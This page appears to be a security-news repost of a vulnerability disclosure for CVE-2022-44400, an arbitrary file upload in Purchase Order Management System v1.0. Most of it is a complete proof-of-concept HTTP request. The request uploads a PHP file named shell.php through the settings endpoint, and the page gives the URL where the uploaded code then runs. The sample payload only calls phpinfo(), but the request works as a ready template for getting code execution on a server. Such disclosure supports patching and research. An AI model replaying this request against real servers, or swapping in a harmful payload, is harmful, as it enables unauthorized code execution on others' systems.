Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-44400: bug_report/UPLOAD-1.md at main · lcg-22266/bug_report

Purchase Order Management System v1.0 contains a file upload vulnerability via /purchase_order/admin/?page=system_info.

CVE
#vulnerability#web#windows#apple#php#chrome#webkit

Permalink

Purchase Order Management System v1.0 by oretnom23 has Any file upload

vendors: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html

Vulnerability url: /purchase_order/admin/?page=system_info

Request package for file upload:

POST /purchase_order/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
Content-Length: 880
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4kTb0mE24bRNykxY
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/purchase_order/admin/?page=system_info
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=s87kdnnrqs6s4qkbpf0vps3gi4
Connection: close

------WebKitFormBoundary4kTb0mE24bRNykxY
Content-Disposition: form-data; name="name"

s
------WebKitFormBoundary4kTb0mE24bRNykxY
Content-Disposition: form-data; name="short_name"

b
------WebKitFormBoundary4kTb0mE24bRNykxY
Content-Disposition: form-data; name="company_name"

v
------WebKitFormBoundary4kTb0mE24bRNykxY
Content-Disposition: form-data; name="company_email"

d
------WebKitFormBoundary4kTb0mE24bRNykxY
Content-Disposition: form-data; name="company_address"

e
------WebKitFormBoundary4kTb0mE24bRNykxY
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
------WebKitFormBoundary4kTb0mE24bRNykxY
Content-Disposition: form-data; name="cover"; filename="shell.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
------WebKitFormBoundary4kTb0mE24bRNykxY--

The file will be uploaded to the uploads directory

We visit the url of the shell.php file and find that the code has been executed

Url: http://ip/purchase_order/uploads/1666942320_shell.php

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907